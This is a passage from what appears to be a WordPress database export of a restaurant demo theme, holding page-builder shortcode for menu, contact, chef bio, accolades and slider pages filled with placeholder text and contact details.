disable_break_words=\"no\" line_margin=\"10px 0 0 0\" line_length=\"20px\" title=\"Afterdinner cocktails\" title_break_words=\"1\"][/mkdf_section_title][vc_empty_space height=\"10px\"][vc_column_text]Sazerac\n(Rye, genever, demerara, and green chartreuse)[/vc_column_text][vc_empty_space height=\"20px\"][vc_column_text]Sour\n(Scotch, cranberry grenadine, lemon, and gilka kummel)[/vc_column_text][vc_empty_space height=\"20px\"][vc_column_text]Stirred\n(Pineapple rum, sweet vermouth, amaro lucano, and saline)[/vc_column_text][vc_empty_space height=\"20px\"][vc_column_text]GinTonic\n(Gins, Elske tonic syrup, and lime)[/vc_column_text][vc_empty_space height=\"100px\"][mkdf_section_title type=\"standard\" position=\"\" title_tag=\"h5\" disable_break_words=\"no\" line_margin=\"10px 0 0 0\" line_length=\"20px\" title=\"Wine\" title_break_words=\"1\"][/mkdf_section_title][vc_empty_space height=\"10px\"][vc_column_text]Aubry 1er Cru Brut\nFrance (Champagne) Chardonnay, Pinot Noir[/vc_column_text][vc_empty_space height=\"20px\"][vc_column_text]Chateau Marguii Rose 2016\nFrance (Provence) Cinsault, Grenache[/vc_column_text][vc_empty_space height=\"20px\"][vc_column_text]Clos Tue Boeuf \'Petit Blanc\' 2016\nFrance (Loire) Sauvignon Blanc[/vc_column_text][vc_empty_space height=\"20px\"][vc_column_text]Niepoort \'Redoma Branco\' 2015\nPortugal (Douro) Rabigato, Codéga de Larinho[/vc_column_text][vc_empty_space height=\"20px\"][vc_column_text]Guillot Broux \'Genievrieres\' 2015\nFrance (Burgundy) Chardonnay[/vc_column_text][vc_empty_space height=\"20px\"][vc_column_text]Day Wines \'Cancilla Vineyard\' 2014\nUnited States (Willamette) Pinot Noir[/vc_column_text][vc_empty_space height=\"100px\"][mkdf_section_title type=\"standard\" position=\"\" title_tag=\"h5\" disable_break_words=\"no\" line_margin=\"10px 0 0 0\" line_length=\"20px\" title=\"Appetizers\" title_break_words=\"1\"][/mkdf_section_title][vc_empty_space height=\"10px\"][vc_column_text]Sazerac\n(Rye, genever, demerara, and green chartreuse)[/vc_column_text][vc_empty_space height=\"20px\"][vc_column_text]Sour\n(Scotch, cranberry grenadine, lemon, and gilka kummel)[/vc_column_text][vc_empty_space height=\"20px\"][vc_column_text]Stirred\n(Pineapple rum, sweet vermouth, amaro lucano, and saline)[/vc_column_text][vc_empty_space height=\"20px\"][vc_column_text]GinTonic\n(Gins, Elske tonic syrup, and lime)[/vc_column_text][vc_empty_space height=\"20px\"][vc_column_text]Aubry 1er Cru Brut\nFrance (Champagne) Chardonnay, Pinot Noir[/vc_column_text][vc_empty_space height=\"20px\"][vc_column_text]Chateau Marguii Rose 2016\nFrance (Provence) Cinsault, Grenache[/vc_column_text][vc_empty_space height=\"20px\"][vc_column_text]Clos Tue Boeuf \'Petit Blanc\' 2016\nFrance (Loire) Sauvignon Blanc[/vc_column_text][vc_empty_space height=\"20px\"][vc_column_text]Niepoort \'Redoma Branco\' 2015\nPortugal (Douro) Rabigato, Codéga de Larinho[/vc_column_text][vc_empty_space height=\"20px\"][vc_column_text]Guillot Broux \'Genievrieres\' 2015\nFrance (Burgundy) Chardonnay[/vc_column_text][vc_empty_space height=\"120px\"][/mkdf_elements_holder_item][/mkdf_elements_holder][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row]','Restaurant Menu Right','','draft','closed','closed','','restaurant-menu-right','','','2020-12-05 17:55:00','2020-12-05 16:55:00','',0,'http://attika.mikado-themes.com/?page_id=417',0,'page','',0),(3049,1,'2018-08-03 08:46:18','2018-08-03 06:46:18','[vc_row content_placement=\"bottom\" row_content_width=\"grid\" css=\".vc_custom_1535113284246{padding-top: 130px !important;}\"][vc_column width=\"5/6\" offset=\"vc_col-lg-4 vc_col-md-6 vc_col-xs-12\"][mkdf_elements_holder holder_full_height=\"no\" number_of_columns=\"one-column\" switch_to_one_column=\"\" alignment_one_column=\"\"][mkdf_elements_holder_item item_padding=\"0 0 0px 0\" item_padding_1367_1600=\"0 0 0px 0\" item_padding_1025_1366=\"0 0 0px 0\" item_padding_769_1024=\"0 0 0px 0\" item_padding_681_768=\"0 0 20px 0\" item_padding_680=\"0 0 30px 0\"][mkdf_section_title type=\"standard\" position=\"left\" title_tag=\"\" disable_break_words=\"no\" text_tag=\"\" text_font_weight=\"\" line_length=\"120px\" title=\"Contact Us\" title_break_words=\"1\" text=\"Attica Fine Dining Restaurant\nRainbow Ridge Dr street 35\nNY City, NY\" text_margin=\"45px\" line_margin=\"50px 14% 5% 20%\"]Attika Fine Dining Restaurant\nRainbow Ridge Dr street 35\nNY City, NY[/mkdf_section_title][/mkdf_elements_holder_item][/mkdf_elements_holder][/vc_column][vc_column width=\"1/12\" offset=\"vc_hidden-md vc_hidden-xs\"][/vc_column][vc_column width=\"1/3\" offset=\"vc_col-lg-2 vc_col-md-3\"][vc_column_text]Phone:\n\n<a href=\"tel:+445135340089\">+445135340089</a>\n<a href=\"tel:+4540183 293763\">+4540183 293763</a>\n<a href=\"tel:+454 338 2748123\">+454 338 2748123</a>[/vc_column_text][vc_empty_space height=\"15px\"][/vc_column][vc_column width=\"1/6\" offset=\"vc_col-lg-1 vc_hidden-md vc_hidden-xs\"][/vc_column][vc_column width=\"1/2\" offset=\"vc_col-lg-4 vc_col-md-3\"][vc_column_text]Email:\n\n<a href=\"mailto:info@attikarestaurant.ny\">info@attikarestaurant.ny</a>\n<a href=\"mailto:info@attika.ny\">info@attika.ny</a>[/vc_column_text][vc_empty_space height=\"45px\"][/vc_column][/vc_row][vc_row row_content_width=\"grid\" css=\".vc_custom_1534171353151{padding-top: 65px !important;padding-bottom: 130px !important;}\"][vc_column][mkdf_google_map snazzy_map_style=\"yes\" address1=\"Brit Sec Limited, 99 Bishopsgate, London EC2M 3XD, UK\" zoom=\"18\" map_height=\"345\" pin=\"224\" snazzy_map_code=\"`{`\n{\n``elementType``: ``geometry``,\n``stylers``: `{`\n{\n``color``: ``#f5f5f5``\n}\n`}`\n},\n{\n``elementType``: ``labels.icon``,\n``stylers``: `{`\n{\n``visibility``: ``off``\n}\n`}`\n},\n{\n``elementType``: ``labels.text.fill``,\n``stylers``: `{`\n{\n``color``: ``#616161``\n}\n`}`\n},\n{\n``elementType``: ``labels.text.stroke``,\n``stylers``: `{`\n{\n``color``: ``#f5f5f5``\n}\n`}`\n},\n{\n``featureType``: ``administrative.land_parcel``,\n``elementType``: ``labels.text.fill``,\n``stylers``: `{`\n{\n``color``: ``#bdbdbd``\n}\n`}`\n},\n{\n``featureType``: ``poi``,\n``elementType``: ``geometry``,\n``stylers``: `{`\n{\n``color``: ``#eeeeee``\n}\n`}`\n},\n{\n``featureType``: ``poi``,\n``elementType``: ``labels.text.fill``,\n``stylers``: `{`\n{\n``color``: ``#757575``\n}\n`}`\n},\n{\n``featureType``: ``poi.park``,\n``elementType``: ``geometry``,\n``stylers``: `{`\n{\n``color``: ``#e5e5e5``\n}\n`}`\n},\n{\n``featureType``: ``poi.park``,\n``elementType``: ``labels.text.fill``,\n``stylers``: `{`\n{\n``color``: ``#9e9e9e``\n}\n`}`\n},\n{\n``featureType``: ``road``,\n``elementType``: ``geometry``,\n``stylers``: `{`\n{\n``color``: ``#ffffff``\n}\n`}`\n},\n{\n``featureType``: ``road.arterial``,\n``elementType``: ``labels.text.fill``,\n``stylers``: `{`\n{\n``color``: ``#757575``\n}\n`}`\n},\n{\n``featureType``: ``road.highway``,\n``elementType``: ``geometry``,\n``stylers``: `{`\n{\n``color``: ``#dadada``\n}\n`}`\n},\n{\n``featureType``: ``road.highway``,\n``elementType``: ``labels.text.fill``,\n``stylers``: `{`\n{\n``color``: ``#616161``\n}\n`}`\n},\n{\n``featureType``: ``road.local``,\n``elementType``: ``labels.text.fill``,\n``stylers``: `{`\n{\n``color``: ``#9e9e9e``\n}\n`}`\n},\n{\n``featureType``: ``transit.line``,\n``elementType``: ``geometry``,\n``stylers``: `{`\n{\n``color``: ``#e5e5e5``\n}\n`}`\n},\n{\n``featureType``: ``transit.station``,\n``elementType``: ``geometry``,\n``stylers``: `{`\n{\n``color``: ``#eeeeee``\n}\n`}`\n},\n{\n``featureType``: ``water``,\n``elementType``: ``geometry``,\n``stylers``: `{`\n{\n``color``: ``#c9c9c9``\n}\n`}`\n},\n{\n``featureType``: ``water``,\n``elementType``: ``labels.text.fill``,\n``stylers``: `{`\n{\n``color``: ``#9e9e9e``\n}\n`}`\n}\n`}`\"][/vc_column][/vc_row]','Contact Us','','draft','closed','closed','','contact-us','','','2020-12-05 17:47:28','2020-12-05 16:47:28','',0,'http://attika.mikado-themes.com/?page_id=430',0,'page','',0),(3050,1,'2018-08-03 11:47:44','2018-08-03 11:47:44','[vc_row content_placement=\"top\" row_content_width=\"grid\" css=\".vc_custom_1535634921180{padding-top: 130px !important;padding-bottom: 120px !important;}\"][vc_column width=\"1/3\" offset=\"vc_col-lg-4 vc_col-md-8 vc_col-xs-12\"][mkdf_section_title type=\"standard\" position=\"left\" title_tag=\"\" disable_break_words=\"no\" text_tag=\"\" text_font_weight=\"\" line_length=\"120px\" title=\"Visit Us\" title_break_words=\"1\" text=\"Attica Fine Dining Restaurant\nRainbow Ridge Dr street 35\nNY City, NY\" text_margin=\"45px\" line_margin=\"50px 14% 0 20%\" holder_padding=\"0 0 15% 0\"]Attika Fine Dining Restaurant\nRainbow Ridge Dr street 35\nNY City, NY[/mkdf_section_title][/vc_column][vc_column width=\"1/3\" offset=\"vc_col-lg-3 vc_col-md-4 vc_col-xs-12\"][mkdf_elements_holder holder_full_height=\"no\" number_of_columns=\"one-column\" switch_to_one_column=\"\" alignment_one_column=\"\"][mkdf_elements_holder_item item_padding=\"155px 0 0 0\" item_padding_1367_1600=\"155px 0 0 0\" item_padding_680=\"80px 0 0 0\"][vc_column_text]Phone:\n\n<a href=\"tel:+445135340089\">+445135340089</a>\n<a href=\"tel:+4540183293763\">+4540183 293763</a>\n<a href=\"tel:+4543382748123\">+454 338 2748123</a>[/vc_column_text][vc_empty_space height=\"35px\"][vc_column_text]Email:\n\n<a href=\"mailto:info@attikarestaurant.ny\">info@attikarestaurant.ny</a>[/vc_column_text][/mkdf_elements_holder_item][/mkdf_elements_holder][/vc_column][vc_column width=\"2/3\" offset=\"vc_col-lg-5 vc_col-md-8 vc_hidden-md vc_hidden-sm vc_col-xs-12 vc_hidden-xs\"][vc_empty_space height=\"135px\"][mkdf_google_map snazzy_map_style=\"yes\" address1=\"Brit Sec Limited, 99 Bishopsgate, London EC2M 3XD, UK\" zoom=\"18\" map_height=\"270\" pin=\"224\" snazzy_map_code=\"`{`\n{\n``elementType``: ``geometry``,\n``stylers``: `{`\n{\n``color``: ``#f5f5f5``\n}\n`}`\n},\n{\n``elementType``: ``labels.icon``,\n``stylers``: `{`\n{\n``visibility``: ``off``\n}\n`}`\n},\n{\n``elementType``: ``labels.text.fill``,\n``stylers``: `{`\n{\n``color``: ``#616161``\n}\n`}`\n},\n{\n``elementType``: ``labels.text.stroke``,\n``stylers``: `{`\n{\n``color``: ``#f5f5f5``\n}\n`}`\n},\n{\n``featureType``: ``administrative.land_parcel``,\n``elementType``: ``labels.text.fill``,\n``stylers``: `{`\n{\n``color``: ``#bdbdbd``\n}\n`}`\n},\n{\n``featureType``: ``poi``,\n``elementType``: ``geometry``,\n``stylers``: `{`\n{\n``color``: ``#eeeeee``\n}\n`}`\n},\n{\n``featureType``: ``poi``,\n``elementType``: ``labels.text.fill``,\n``stylers``: `{`\n{\n``color``: ``#757575``\n}\n`}`\n},\n{\n``featureType``: ``poi.park``,\n``elementType``: ``geometry``,\n``stylers``: `{`\n{\n``color``: ``#e5e5e5``\n}\n`}`\n},\n{\n``featureType``: ``poi.park``,\n``elementType``: ``labels.text.fill``,\n``stylers``: `{`\n{\n``color``: ``#9e9e9e``\n}\n`}`\n},\n{\n``featureType``: ``road``,\n``elementType``: ``geometry``,\n``stylers``: `{`\n{\n``color``: ``#ffffff``\n}\n`}`\n},\n{\n``featureType``: ``road.arterial``,\n``elementType``: ``labels.text.fill``,\n``stylers``: `{`\n{\n``color``: ``#757575``\n}\n`}`\n},\n{\n``featureType``: ``road.highway``,\n``elementType``: ``geometry``,\n``stylers``: `{`\n{\n``color``: ``#dadada``\n}\n`}`\n},\n{\n``featureType``: ``road.highway``,\n``elementType``: ``labels.text.fill``,\n``stylers``: `{`\n{\n``color``: ``#616161``\n}\n`}`\n},\n{\n``featureType``: ``road.local``,\n``elementType``: ``labels.text.fill``,\n``stylers``: `{`\n{\n``color``: ``#9e9e9e``\n}\n`}`\n},\n{\n``featureType``: ``transit.line``,\n``elementType``: ``geometry``,\n``stylers``: `{`\n{\n``color``: ``#e5e5e5``\n}\n`}`\n},\n{\n``featureType``: ``transit.station``,\n``elementType``: ``geometry``,\n``stylers``: `{`\n{\n``color``: ``#eeeeee``\n}\n`}`\n},\n{\n``featureType``: ``water``,\n``elementType``: ``geometry``,\n``stylers``: `{`\n{\n``color``: ``#c9c9c9``\n}\n`}`\n},\n{\n``featureType``: ``water``,\n``elementType``: ``labels.text.fill``,\n``stylers``: `{`\n{\n``color``: ``#9e9e9e``\n}\n`}`\n}\n`}`\"][/vc_column][/vc_row][vc_row content_placement=\"top\" row_content_width=\"grid\" css=\".vc_custom_1534159322757{padding-bottom: 90px !important;}\"][vc_column offset=\"vc_col-lg-7 vc_col-md-7\" css=\".vc_custom_1535112631536{padding-right: 5% !important;padding-left: 5% !important;}\"][mkdf_instagram_list number_of_columns=\"three\" space_between_columns=\"normal\" image_size=\"standard_resolution\" slider_loop=\"yes\" slider_autoplay=\"yes\" slider_navigation=\"yes\" slider_pagination=\"no\" number_of_photos=\"6\"][/vc_column][vc_column width=\"1/12\" css=\".vc_custom_1534163857016{padding-right: 0px !important;padding-left: 0px !important;}\" offset=\"vc_hidden-md vc_hidden-sm vc_hidden-xs\"][/vc_column][vc_column css=\".vc_custom_1534165933476{padding-right: 0px !important;}\" offset=\"vc_col-lg-4 vc_col-md-5\"][mkdf_section_title type=\"standard\" position=\"left\" title_tag=\"h3\" disable_break_words=\"no\" title=\"Follow us on instagram\" line_length=\"0px\" title_break_words=\"1,3\"][/mkdf_section_title][vc_empty_space height=\"10px\"][mkdf_icon icon_pack=\"simple_line_icons\" simple_line_icon=\"icon-social-instagram\" type=\"mkdf-circle\" target=\"_blank\" custom_size=\"25\" shape_size=\"85\" icon_color=\"#111111\" background_color=\"#faf5f0\" hover_icon_color=\"#a1a1a1\" link=\"https://www.instagram.com/attika.mikado/\"][/vc_column][/vc_row][vc_row css=\".vc_custom_1533304689022{padding-bottom: 60px !important;}\"][vc_column width=\"1/2\" css=\".vc_custom_1535112595718{margin-left: 0px !important;padding-right: 0px !important;padding-left: 0px !important;}\" offset=\"vc_col-lg-1/5 vc_col-md-3 vc_col-xs-12\"][mkdf_info_box title_tag=\"h5\" box_background_color=\"#f8f2ed\" title=\"Generic\" content_padding=\"32%\" email=\"info@attika.ny\" link=\"mailto:info@attika.ny\"][/vc_column][vc_column width=\"1/5\" css=\".vc_custom_1535110087401{padding-right: 0px !important;padding-left: 0px !important;}\" offset=\"vc_hidden-md vc_hidden-sm vc_hidden-xs\"][/vc_column][vc_column width=\"1/2\" css=\".vc_custom_1535110136872{padding-right: 0px !important;padding-left: 0px !important;}\" offset=\"vc_col-lg-1/5 vc_col-md-3 vc_col-xs-12\"][mkdf_info_box title_tag=\"h5\" box_background_color=\"#fef8f7\" title=\"Press\" content_padding=\"32%\" email=\"info@attika.ny\" link=\"mailto:info@attika.ny\"][/vc_column][vc_column width=\"1/2\" css=\".vc_custom_1534165820540{padding-right: 0px !important;padding-left: 0px !important;}\" offset=\"vc_col-lg-1/5 vc_col-md-3 vc_col-xs-12\"][mkdf_info_box title_tag=\"h5\" box_background_color=\"#fef8f7\" title=\"Inquiry\" content_padding=\"32%\" email=\"info@attika.ny\" link=\"mailto:info@attika.ny\"][/vc_column][vc_column width=\"1/2\" css=\".vc_custom_1534165836132{padding-right: 0px !important;padding-left: 0px !important;}\" offset=\"vc_col-lg-1/5 vc_col-md-3 vc_col-xs-12\"][mkdf_info_box title_tag=\"h5\" box_background_color=\"#fef8f7\" title=\"Events\" content_padding=\"32%\" email=\"info@attika.ny\" link=\"mailto:info@attika.ny\"][/vc_column][/vc_row][vc_row parallax_background_image=\"488\" parallax_bg_height=\"465\"][vc_column][/vc_column][/vc_row][vc_row][vc_column][vc_empty_space height=\"60px\"][/vc_column][/vc_row]','Visit Us','','publish','closed','closed','','visit-us','','','2018-08-03 11:47:44','2018-08-03 11:47:44','',0,'http://attika.mikado-themes.com/?page_id=458',0,'page','',0),(3051,1,'2018-08-03 13:05:51','2018-08-03 13:05:51','[vc_row full_height=\"yes\" row_content_width=\"grid\" content_text_aligment=\"right\" parallax_background_image=\"1570\" parallax_bg_speed=\"0\"][vc_column width=\"5/6\" css=\".vc_custom_1534508236123{padding-right: 0px !important;}\" offset=\"vc_col-lg-8 vc_col-md-10 vc_col-xs-12\"][mkdf_elements_holder holder_full_height=\"no\" number_of_columns=\"one-column\" switch_to_one_column=\"\" alignment_one_column=\"\"][mkdf_elements_holder_item item_padding=\"0 0 0 0\" item_padding_1367_1600=\"40px 0 0 80px\" item_padding_1025_1366=\"40px 0 0 80px\" item_padding_769_1024=\"0 0 0 50px\" item_padding_681_768=\"0 0 0 40px\" item_padding_680=\"0 30px 0 0\"][mkdf_section_title type=\"standard\" position=\"left\" title_tag=\"\" disable_break_words=\"no\" text_tag=\"\" text_font_weight=\"\" line_length=\"120px\" title=\"Coming Soon\" title_break_words=\"1\" text=\"Attica Fine Dining Restaurant\nRainbow Ridge Dr street 35\nNY City, NY\" text_margin=\"35px\" line_margin=\"45px 5% 0 10%\" title_color=\"#ffffff\" line_color=\"#ffffff\"]<span style=\"color: #ffffff;\">Lorem ipsum dolor sit amet, consectetuer adipiscing elit. Aenean commodo ligula eget dolor. Aenean massa. Cum sociis Theme natoque penatibus et magnis dis parturient montes, nascetur ridiculus muslorem auci viverra quis elit varius laoreet.</span>[/mkdf_section_title][vc_empty_space height=\"40px\"][mkdf_button type=\"simple\" text=\"See full menu\" target=\"_self\" icon_pack=\"\" font_weight=\"\" text_transform=\"\" link=\"#\" color=\"#ffffff\" hover_color=\"rgba(255,255,255,0.5)\" line_color=\"#ffffff\"][vc_empty_space height=\"40px\"][/mkdf_elements_holder_item][/mkdf_elements_holder][/vc_column][vc_column width=\"1/6\" offset=\"vc_col-lg-4 vc_col-md-2 vc_hidden-xs\"][/vc_column][/vc_row]','Coming Soon Page','','publish','closed','closed','','coming-soon-page','','','2018-08-03 13:05:51','2018-08-03 13:05:51','',0,'http://attika.mikado-themes.com/?page_id=482',0,'page','',0),(3052,1,'2018-08-03 14:24:14','2018-08-03 14:24:14','[vc_row content_placement=\"top\" content_text_aligment=\"center\"][vc_column][mkdf_elements_holder holder_full_height=\"no\" number_of_columns=\"two-columns\" switch_to_one_column=\"1024\" alignment_one_column=\"\"][mkdf_elements_holder_item horizontal_alignment=\"center\" vertical_alignment=\"top\" item_padding=\"0 0 0 38%\" item_padding_680=\"0 0 0 5%\" item_padding_681_768=\"0 0 0 9%\" item_padding_1367_1600=\"0 0 0 13%\" item_padding_1025_1366=\"0 0 0 15%\" item_padding_769_1024=\"0 0 0 9%\"][mkdf_section_title type=\"standard\" position=\"left\" title_tag=\"\" disable_break_words=\"no\" text_tag=\"\" text_font_weight=\"\" line_length=\"120px\" title=\"Your Chef\" title_break_words=\"1\" text=\"Etiam rhoncus. Lorem ipsum dolor sit amet, consectetuer adipiscing elit. Aenean commodo ligula eget dolor. Aenean massa. Cum sociis Theme natoque penatibus et magnis dis parturient montes, nascetur ridiculus mus. Phasellus viverra nulla ut metus varius laoreet. Quisque rutrum. Aenean imperdiet. Etiam ultricies nisi vel augue. Curabitur ullamcorper ultricies nisi. Nam eget dui. Lorem ipsum dolor sit amet, consectetuer adipiscing elit. Aenean commodo ligula eget dolor. Etiam ultricies nisi vel augue. Curabitur ullamcorper ultricies nisi. Quisque rutrum.\n\nNakon brejka\" text_margin=\"45px\" line_margin=\"50px 9% 0 14%\" holder_padding=\"0 0 15% 0\" text_padding=\"100px\" text_right_padding=\"90px\"]Etiam rhoncus. Maecenas tempus, tellus eget condimentum rhoncus, sem quam semper libero, sit amet adipiscing sem neque sed ipsum. Donec vitae sapien ut libero venenatis faucibus. Nullam quis ante. Etiam sit amet orci eget eros faucibus tincidunt. Duis leo. Lorem ipsum dolor sit amet, consectetuer adipiscing elit. Aenean commodo ligula eget dolor. Aenean massa. Cum sociis Theme natoque penatibus et magnis dis parturient montes, nascetur ridiculus mus etiamsit amet orci eget eros faucibus tincidunt duis leosed fringilla mauris sit amet nibh metus varius laoreet.[vc_empty_space height=\"30px\"]Lorem ipsum dolor sit amet, consectetuer adipiscing elit. Aenean commodo ligula eget dolor. Aenean massa. Cum sociis Theme natoque penatibus et magnis dis parturient montes, nascetur ridiculus.[/mkdf_section_title][vc_empty_space height=\"50px\"][mkdf_single_image enable_image_shadow=\"no\" center_image=\"yes\" image=\"636\" image_size=\"full\"][vc_empty_space height=\"70px\"][/mkdf_elements_holder_item][mkdf_elements_holder_item vertical_alignment=\"top\" item_padding=\"0 0 0 9%\"][mkdf_single_image enable_image_shadow=\"no\" center_image=\"no\" image=\"718\" image_size=\"full\"][/mkdf_elements_holder_item][/mkdf_elements_holder][/vc_column][/vc_row][vc_row css=\".vc_custom_1533721367903{padding-top: 100px !important;padding-bottom: 100px !important;}\"][vc_column][vc_row_inner row_content_width=\"grid\" enable_parallax_background_elements=\"yes\" parallax_background_elements_vertical_alignment=\"middle\" enable_parallax_effect=\"no\" left_parallax_background_element=\"721\"][vc_column_inner width=\"1/12\" offset=\"vc_hidden-md vc_hidden-sm vc_hidden-xs\"][/vc_column_inner][vc_column_inner offset=\"vc_col-lg-4 vc_col-md-5 vc_col-xs-12\"][mkdf_single_image enable_image_shadow=\"no\" center_image=\"no\" enable_parallax=\"yes\" parallax_offset=\"30\" parallax_smoothness=\"30\" image=\"723\" image_size=\"full\"][/vc_column_inner][vc_column_inner width=\"1/12\" offset=\"vc_hidden-md vc_hidden-sm vc_hidden-xs\"][/vc_column_inner][vc_column_inner css=\".vc_custom_1534512863336{padding-left: 0px !important;}\" offset=\"vc_col-lg-6 vc_col-md-7 vc_col-xs-12\"][vc_empty_space height=\"80px\"][mkdf_section_title type=\"standard\" position=\"left\" title_tag=\"\" disable_break_words=\"no\" text_tag=\"\" text_font_weight=\"\" line_length=\"120px\" title=\"Individual recognition\" title_break_words=\"1\" text=\"Etiam rhoncus. Lorem ipsum dolor sit amet, consectetuer adipiscing elit. Aenean commodo ligula eget dolor. Aenean massa. Cum sociis Theme natoque penatibus et magnis dis parturient montes, nascetur ridiculus mus. Phasellus viverra nulla ut metus varius laoreet. Quisque rutrum. Aenean imperdiet. Etiam ultricies nisi vel augue. Curabitur ullamcorper ultricies nisi. Nam eget dui. Lorem ipsum dolor sit amet, consectetuer adipiscing elit. Aenean commodo ligula eget dolor. Etiam ultricies nisi vel augue. Curabitur ullamcorper ultricies nisi. Quisque rutrum.\n\nNakon brejka\" text_margin=\"45px\" line_margin=\"50px 9% 0 26%\" holder_padding=\"0 0 15% 0\" text_padding=\"100px\" text_right_padding=\"0\"]Le Chef 2018:\n100 Chefs[vc_empty_space height=\"30px\"]The Best Chef Awards:\n#86, Ambassador 2017[vc_empty_space height=\"30px\"]Le Chef 2017:\n100 Chefs[vc_empty_space height=\"30px\"]World Gourmet Series Awards of Excellence 2017:\nChef of the Year[vc_empty_space height=\"30px\"]World Gourmet Series Awards of Excellence 2014:\nKitchenAid Chef of the Year[vc_empty_space height=\"30px\"]At-Sunrice GlobalChef Award 2013[vc_empty_space height=\"30px\"]World Gourmet Series Awards of Excellence 2012:\nMeat and Livestock Australia ‘Rising Chef of the Year’[/mkdf_section_title][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row]','Chef Bio','','publish','closed','closed','','chef-bio','','','2018-08-03 14:24:14','2018-08-03 14:24:14','',0,'http://attika.mikado-themes.com/?page_id=513',0,'page','',0),(3053,1,'2018-08-06 12:46:25','2018-08-06 12:46:25','[vc_row][vc_column][mkdf_portfolio_slider enable-center=\"yes\" enable-auto-width=\"yes\" space_between_items=\"normal\" image_proportions=\"full\" orderby=\"date\" order=\"ASC\" portfolio_slider_full_height_decrease=\"yes\" item_style=\"gallery-info-bottom\" title_tag=\"h5\" enable_loop=\"yes\" enable_autoplay=\"yes\" enable_navigation=\"no\" enable_pagination=\"no\" enable_mousewheel_scroll=\"yes\" category=\"dessert\"][/vc_column][/vc_row]','Columns Carousel','','publish','closed','closed','','columns-carousel','','','2018-08-06 12:46:25','2018-08-06 12:46:25','',0,'http://attika.mikado-themes.com/?page_id=569',0,'page','',0),(3054,1,'2018-08-07 07:57:09','2018-08-07 05:57:09','[vc_row css=\".vc_custom_1533717792911{padding-top: 150px !important;padding-bottom: 150px !important;}\"][vc_column][vc_row_inner row_content_width=\"grid\" enable_parallax_background_elements=\"yes\" parallax_background_elements_vertical_alignment=\"bottom\" enable_parallax_effect=\"no\" left_parallax_background_element=\"696\" right_parallax_background_element=\"697\"][vc_column_inner width=\"5/6\" css=\".vc_custom_1534508595924{margin-top: -130px !important;}\" offset=\"vc_col-lg-6 vc_col-md-10 vc_col-xs-12\"][mkdf_section_title type=\"standard\" position=\"left\" title_tag=\"\" disable_break_words=\"no\" line_length=\"115px\" title=\"Accolades\" title_break_words=\"1\" text=\"\" line_margin=\"60px 9% 0 18%\" holder_padding=\"0 0 15% 0\" text_margin=\"50px\" text_right_padding=\"0\"]One Michelin star, 2017 Michelin Guide New York[vc_empty_space height=\"30px\"]One Michelin star, 2017 Michelin Guide New York[vc_empty_space height=\"30px\"]Indoguna Best Restaurant 2015, World Gourmet Summit[vc_empty_space height=\"30px\"]Eurocave Old World Wine List of the Year 2015,\nWorld Gourmet Summit[vc_empty_space height=\"30px\"]Best New Restaurant 2014 (Western), The Peak Gourmet and Travel[vc_empty_space height=\"30px\"]San Pellegrino Best New Restaurant 2014, World Gourmet Summit[vc_empty_space height=\"30px\"]\nBest Western Wine List 2014, Wine &amp; Dine[/mkdf_section_title][vc_empty_space height=\"200px\"][mkdf_single_image enable_image_shadow=\"no\" center_image=\"no\" image=\"703\" image_size=\"full\"][vc_empty_space height=\"50px\"][/vc_column_inner][vc_column_inner width=\"1/6\" offset=\"vc_col-lg-6 vc_col-md-2 vc_hidden-xs\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row]','Accolades','','draft','closed','closed','','accolades','','','2020-12-05 17:46:31','2020-12-05 16:46:31','',0,'http://attika.mikado-themes.com/?page_id=596',0,'page','',0),(3055,1,'2018-08-07 10:08:06','2018-08-07 10:08:06','<p>[vc_row content_text_aligment=\"center\"][vc_column][mkdf_portfolio_slider enable-center=\"no\" enable-auto-width=\"no\" number_of_columns=\"one\" space_between_items=\"no\" image_proportions=\"full\" orderby=\"date\" order=\"ASC\" portfolio_slider_full_height_decrease=\"yes\" item_style=\"slider-overlay\" enable_loop=\"yes\" enable_autoplay=\"yes\" enable_navigation=\"yes\" enable_navigation_numbers=\"yes\" navigation_number_position=\"outer\" enable_pagination=\"yes\" pagination_skin=\"dark\" pagination_position=\"below-slider\" enable_title_pag=\"yes\" enable_mousewheel_scroll=\"yes\" category=\"new\" number_of_items=\"5\"][/vc_column][/vc_row]</p>\r\n','Dish Showcase','','publish','closed','closed','','dish-showcase','','','2020-12-06 18:17:25','2020-12-06 17:17:25','',0,'http://attika.mikado-themes.com/?page_id=610',0,'page','',0),(3056,1,'2018-08-07 11:28:17','2018-08-07 11:28:17','[vc_row][vc_column][rev_slider_vc alias=\"home\" enable_paspartu=\"no\"][/vc_column][/vc_row][vc_row row_content_width=\"grid\" css=\".vc_custom_1535368696442{padding-top: 123px !important;padding-bottom: 90px !important;}\"][vc_column width=\"1/12\"][/vc_column][vc_column width=\"5/6\"][mkdf_section_title type=\"standard\" position=\"\" title_tag=\"h3\" disable_break_words=\"no\" title=\"visual pleasures\" text_margin=\"30px\" line_length=\"0px\"]Lorem ipsum dolor sit amet, consectetur adipiscing elit. Duis et nulla vitae nunc molestie laoreet. Aliquam at malesuada eros. Lorem ipsum dolor sit amet, consectetur adipiscing elit. Sed quis aliquet ligula. Interdum et malesuada fames ac ante ipsum primis in faucibus. Donec urna justo, mollis ut vestibulum.[/mkdf_section_title][vc_row_inner content_text_aligment=\"right\"][vc_column_inner][mkdf_button type=\"simple\" text=\"see more\" target=\"_self\" icon_pack=\"\" font_weight=\"\" text_transform=\"\" link=\"#\" margin=\"53px 0% 0 0%\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row full_height=\"yes\" equal_height=\"yes\" content_text_aligment=\"center\" css=\".vc_custom_1536934540610{padding-top: 100px !important;padding-bottom: 100px !important;}\" simple_background_color=\"#e7dfdf\"][vc_column][vc_row_inner row_content_width=\"grid\"][vc_column_inner][mkdf_portfolio_slider enable-center=\"no\" enable-auto-width=\"no\" number_of_columns=\"one\" space_between_items=\"no\" image_proportions=\"full\" orderby=\"date\" order=\"ASC\" enable_fullheight=\"no\" portfolio_slider_full_height_decrease=\"no\" item_style=\"gallery-overlay\" title_tag=\"h6\" enable_category=\"no\" enable_loop=\"yes\" enable_autoplay=\"yes\" enable_navigation=\"yes\" enable_navigation_numbers=\"yes\" navigation_number_position=\"outer\" navigation_skin=\"dark\" enable_pagination=\"no\" enable_mousewheel_scroll=\"no\" category=\"cake\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row row_content_width=\"grid\" css=\".vc_custom_1535368707127{padding-top: 123px !important;padding-bottom: 90px 